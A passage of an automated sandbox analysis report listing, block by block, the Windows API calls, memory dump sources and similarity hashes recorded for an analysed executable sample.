                                              • HeapFree.KERNEL32(00000000), ref: 00398703
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 1592001646-0
                                              • Opcode ID: 6ee1e2bdc9bc4c7bceeaee5502049a96c0f4656eee077bd56a5f87ced6e6357c
                                              • Instruction ID: e35cf7d5c08a4ff7a078ac8a934d677a9dbc00836dd8fbe1d3ac8041babd5497
                                              • Opcode Fuzzy Hash: 6ee1e2bdc9bc4c7bceeaee5502049a96c0f4656eee077bd56a5f87ced6e6357c
                                              • Instruction Fuzzy Hash: 9F219D72E40109EFDF11DFA8C949BEEB7B9EF86304F198059E544AB240DB31AE05CB90
                                              APIs
                                              • __setmode.LIBCMT ref: 003609AE
                                                • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A7896,?,?,00000000), ref: 00345A2C
                                                • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A7896,?,?,00000000,?,?), ref: 00345A50
                                              • _fprintf.LIBCMT ref: 003609E5
                                              • OutputDebugStringW.KERNEL32(?), ref: 00395DBB
                                                • Part of subcall function 00364AAA: _flsall.LIBCMT ref: 00364AC3
                                              • __setmode.LIBCMT ref: 00360A1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                              • String ID:
                                              • API String ID: 521402451-0
                                              • Opcode ID: 2c31477ea2653e5a9f0574e619bda3ff2eba3c0875e7227a340362ec041ed66f
                                              • Instruction ID: 050e48632b58f1400798344f993d46b5e056d86b869de414a7748ae62f4e8f31
                                              • Opcode Fuzzy Hash: 2c31477ea2653e5a9f0574e619bda3ff2eba3c0875e7227a340362ec041ed66f
                                              • Instruction Fuzzy Hash: 961105329042046FDB07B7B49C479BE7BA9DF46320F248056F2055F192EF21585247A5
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003B17A3
                                                • Part of subcall function 003B182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003B184C
                                                • Part of subcall function 003B182D: InternetCloseHandle.WININET(00000000), ref: 003B18E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Internet$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 1463438336-0
                                              • Opcode ID: bfc95d0e6113a64ddc9ad0b3a53133a640890752d51b5aa86bce20fd034cad02
                                              • Instruction ID: abb17ad7ef1dd5d54374559c0a4afd4002f6827ac47341ba779f6fd501f0d802
                                              • Opcode Fuzzy Hash: bfc95d0e6113a64ddc9ad0b3a53133a640890752d51b5aa86bce20fd034cad02
                                              • Instruction Fuzzy Hash: A6218032600605BFEB139F60DC11FFABBAEFB48714F50412AFB15DA950DB71A82197A0
                                              APIs
                                              • GetFileAttributesW.KERNEL32(?,003CFAC0), ref: 003A3A64
                                              • GetLastError.KERNEL32 ref: 003A3A73
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 003A3A82
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003CFAC0), ref: 003A3ADF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: ed19ba9f66bc4d2f948bc19ca765310b7411e93a434d864520fa8f90dfa6344d
                                              • Instruction ID: 4941184b98a2d5daf53ef22b95d53079d45672c7d5412edb0076789fa2f4846e
                                              • Opcode Fuzzy Hash: ed19ba9f66bc4d2f948bc19ca765310b7411e93a434d864520fa8f90dfa6344d
                                              • Instruction Fuzzy Hash: 5721A7755082159F8311DF28C8818ABBBE8FF56364F104A2DF4D9CB2A2D731EE45CB52
                                              APIs
                                              • _free.LIBCMT ref: 00375101
                                                • Part of subcall function 0036571C: __FF_MSGBANNER.LIBCMT ref: 00365733
                                                • Part of subcall function 0036571C: __NMSG_WRITE.LIBCMT ref: 0036573A
                                                • Part of subcall function 0036571C: RtlAllocateHeap.NTDLL(015F0000,00000000,00000001,00000000,?,?,?,00360DD3,?), ref: 0036575F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: cf5b6fd3159d1f22bdfd228e99a9a6ba25d0985dcdd7c3a669dca285c341f8ba
                                              • Instruction ID: 02d99fcdbdebf287ddf14e0f2c5aa7b2c7ffce20e8aafe72c87f60e4753b0322
                                              • Opcode Fuzzy Hash: cf5b6fd3159d1f22bdfd228e99a9a6ba25d0985dcdd7c3a669dca285c341f8ba
                                              • Instruction Fuzzy Hash: D911E372500A15AFCF372F70AC05B6E3B9C9B04362F61C629F90C9A254DEB889408794
                                              APIs
                                                • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A7896,?,?,00000000), ref: 00345A2C
                                                • Part of subcall function 00345A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A7896,?,?,00000000,?,?), ref: 00345A50
                                              • gethostbyname.WSOCK32(?,?,?), ref: 003B6399
                                              • WSAGetLastError.WSOCK32(00000000), ref: 003B63A4
                                              • _memmove.LIBCMT ref: 003B63D1
                                              • inet_ntoa.WSOCK32(?), ref: 003B63DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: fd2baf512e567a941fe3b533942567e194b6fa8da89a5a8fd3cdb1c843ad7f21
                                              • Instruction ID: 53f864d451924378cf871ea09ee9c770157349f7b3ca4434d41b45b3e46f781f
                                              • Opcode Fuzzy Hash: fd2baf512e567a941fe3b533942567e194b6fa8da89a5a8fd3cdb1c843ad7f21
                                              • Instruction Fuzzy Hash: 05115E32900109AFCB06FBA4DD46DEEB7B9EF08314B144065F506EF162DB31AE14DB61
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00398B61
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398B73
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398B89
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398BA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: b1a5f12190042a69b6844b4e9d4fc15efa43e8c24839080110274dea7f6e9ccb
                                              • Instruction ID: f01c84ff28bbfb7e6d5b3c0a45b7c66a416b413b7134d7db7b9854ab2f34e009
                                              • Opcode Fuzzy Hash: b1a5f12190042a69b6844b4e9d4fc15efa43e8c24839080110274dea7f6e9ccb
                                              • Instruction Fuzzy Hash: 9B110A7A901218BFEF11DB95C885E9DBBB8EB49710F244095E900B7250DA716E11DB94
                                              APIs
                                                • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                              • DefDlgProcW.USER32(?,00000020,?), ref: 003412D8
                                              • GetClientRect.USER32(?,?), ref: 0037B5FB
                                              • GetCursorPos.USER32(?), ref: 0037B605
                                              • ScreenToClient.USER32(?,?), ref: 0037B610
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Client$CursorLongProcRectScreenWindow
                                              • String ID:
                                              • API String ID: 4127811313-0
                                              • Opcode ID: 7feb374552b38fb7184ec106ac83baeba051276fad98f17bca4ddc9e46733133
                                              • Instruction ID: 93b39b192860411239dbd01e1a2374304baa07debb1460146254df38475b4dcd
                                              • Opcode Fuzzy Hash: 7feb374552b38fb7184ec106ac83baeba051276fad98f17bca4ddc9e46733133
                                              • Instruction Fuzzy Hash: 3C113A35600519EFCB12EF98D889DFE77F9EB05300F404866FA41EB140D770BA919BA5
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0039D84D
                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0039D864
                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0039D879
                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0039D897
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Type$Register$FileLoadModuleNameUser
                                              • String ID:
                                              • API String ID: 1352324309-0
                                              • Opcode ID: 0f8d76de69e275e7aab28a8f8c8187053847c864639a14316fcb1fb7b9117d0d
                                              • Instruction ID: 2cb5305799123c1b9f69fac2f322c161aec9d71ad019d14f60bcb1f8e6039bd3
                                              • Opcode Fuzzy Hash: 0f8d76de69e275e7aab28a8f8c8187053847c864639a14316fcb1fb7b9117d0d
                                              • Instruction Fuzzy Hash: CE116175609305EFEB218FA1DC0AF93BBFCEB00B00F108569A516D6451D7B0E5499BA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction ID: fcab8033ce09ea5ba8d7ba139b5e7447f35dde372033eb0792ddb109996f6aca
                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction Fuzzy Hash: 94014B7244814EBBCF275F84CC01CEE3F66BB18350B598425FA1C59031D23AD9B1AB81
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 003CB2E4
                                              • ScreenToClient.USER32(?,?), ref: 003CB2FC
                                              • ScreenToClient.USER32(?,?), ref: 003CB320
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003CB33B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: 0fffd6e3103c00fc83a180d3860de646b2de76d4f076a2345225becf2a1efebb
                                              • Instruction ID: d9e92a762e14fae332a6a2da7b130326837b9292709cb13d164907e2686bd1b4
                                              • Opcode Fuzzy Hash: 0fffd6e3103c00fc83a180d3860de646b2de76d4f076a2345225becf2a1efebb
                                              • Instruction Fuzzy Hash: D3114679D00249EFDB41DF99C444AEEFBB9FB08310F104166E914E3220D735AA659F50
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 003A6BE6
                                                • Part of subcall function 003A76C4: _memset.LIBCMT ref: 003A76F9
                                              • _memmove.LIBCMT ref: 003A6C09
                                              • _memset.LIBCMT ref: 003A6C16
                                              • LeaveCriticalSection.KERNEL32(?), ref: 003A6C26
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                              • String ID:
                                              • API String ID: 48991266-0
                                              • Opcode ID: 9eb564b14e7ec81ac456356c7806ebccc0876fcb37b24481639cec9c29c9498e
                                              • Instruction ID: 2468fd1763c6fe3d8d5a9cf89ae81f2f72c1260c1775f5f88cda27510ac23444
                                              • Opcode Fuzzy Hash: 9eb564b14e7ec81ac456356c7806ebccc0876fcb37b24481639cec9c29c9498e
                                              • Instruction Fuzzy Hash: 45F0F47A100110ABCF066F55DC85E4ABB2AEF45361F04C065FE089E267D731E911DBB4
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00342231
                                              • SetTextColor.GDI32(?,000000FF), ref: 0034223B
                                              • SetBkMode.GDI32(?,00000001), ref: 00342250
                                              • GetStockObject.GDI32(00000005), ref: 00342258
                                              • GetWindowDC.USER32(?,00000000), ref: 0037BE83
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0037BE90
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0037BEA9
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0037BEC2
                                              • GetPixel.GDI32(00000000,?,?), ref: 0037BEE2
                                              • ReleaseDC.USER32(?,00000000), ref: 0037BEED
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: 69524ebe985a81b0461679baeeba6f87802744e9b2479d769de7e1d3e50803f2
                                              • Instruction ID: e3e6f1cf09b470e85f8fb5dd22fed22dcf96fcf787627b40479315a359eafeab
                                              • Opcode Fuzzy Hash: 69524ebe985a81b0461679baeeba6f87802744e9b2479d769de7e1d3e50803f2
                                              • Instruction Fuzzy Hash: 9AE06D32104244EEDF225F64FC0DBD87F26EB05332F14C366FA69980E187B29980DB12
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 0039871B
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,003982E6), ref: 00398722
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003982E6), ref: 0039872F
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,003982E6), ref: 00398736
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: 20f5c3db2adc456408fa669daa41e919a8edaf142259f63d146aa185f8e91818
                                              • Instruction ID: 90dc4f520553e9e7d1c2e20817f8f09a67a0afa5ce069de1c8249dedbc2b25a2
                                              • Opcode Fuzzy Hash: 20f5c3db2adc456408fa669daa41e919a8edaf142259f63d146aa185f8e91818
                                              • Instruction Fuzzy Hash: 08E08676611221AFDB215FF09D0CF567BAEFF51B91F154828B685CA040DA349445C750
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %=
                                              • API String ID: 0-1420429418
                                              • Opcode ID: 770af8ba459eff81f44a871b07a7b8c2d85f9da11e5f00c5556efe3afa84b92f
                                              • Instruction ID: 7e99bea27c79d7d26a35b608d4c562a3c62ac9c9eae01a42b3eb1500c1b700c6
                                              • Opcode Fuzzy Hash: 770af8ba459eff81f44a871b07a7b8c2d85f9da11e5f00c5556efe3afa84b92f
                                              • Instruction Fuzzy Hash: 35B19175D001099BCF16EF94C8869EEBBF9EF46310F114126E506AF2A1DB34BE85CB52
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __itow_s
                                              • String ID: xb@$xb@
                                              • API String ID: 3653519197-193068574
                                              • Opcode ID: 4fe1b1f06a3039f3463d7508ce16b98eed697e8bbcd00f8c11c23c31da238079
                                              • Instruction ID: cf130a431081fa32d542cf100ce29665e81be60f3d9cfea41719a78a249951c1
                                              • Opcode Fuzzy Hash: 4fe1b1f06a3039f3463d7508ce16b98eed697e8bbcd00f8c11c23c31da238079
                                              • Instruction Fuzzy Hash: E6B17D70A00109EBCB15DF58C891EFABBF9EF59304F14805AFA459F692EB70E940CB60
                                              APIs
                                                • Part of subcall function 0035FC86: _wcscpy.LIBCMT ref: 0035FCA9
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                              • __wcsnicmp.LIBCMT ref: 003AB02D
                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003AB0F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                              • String ID: LPT
                                              • API String ID: 3222508074-1350329615
                                              • Opcode ID: 2afaff1f0ae48d1ee439fd3c90745858346548b8c530161a5b4772d049d3ad13
                                              • Instruction ID: 80320b3dd8d4134037c193e7ecb8cd7c6b763c53bb6b238b0ed0777fc4a1def7
                                              • Opcode Fuzzy Hash: 2afaff1f0ae48d1ee439fd3c90745858346548b8c530161a5b4772d049d3ad13
                                              • Instruction Fuzzy Hash: 0A617275A00215AFCB16DF98C891EAEF7F8EF09310F11406AF956AF252D770AE44CB50
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 00352968
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00352981
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
